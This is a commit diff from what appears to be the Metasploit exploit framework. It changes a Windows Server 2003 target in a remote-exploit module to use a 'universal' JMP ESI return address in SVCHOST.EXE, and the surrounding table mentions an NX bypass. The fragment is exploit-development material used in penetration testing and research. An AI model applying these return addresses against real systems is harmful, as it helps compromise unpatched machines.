Make 2003 target universal

git-svn-id: file:///home/svn/framework3/trunk@5888 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-11-11 15:22:24 +00:00
parent 54cd265f82
commit b665212b35
1 changed files with 3 additions and 3 deletions

View File

@ -118,12 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass # Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP0 English (NO NX)', [ 'Windows 2003 SP0 Universal',
{ {
'Ret' => 0x71bf175f, 'Ret' => 0x0100129e,
'Scratch' => 0x00020408, 'Scratch' => 0x00020408,
} }
], # JMP ESI WS2HELP.DLL ], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass # Standard return-to-ESI without NX bypass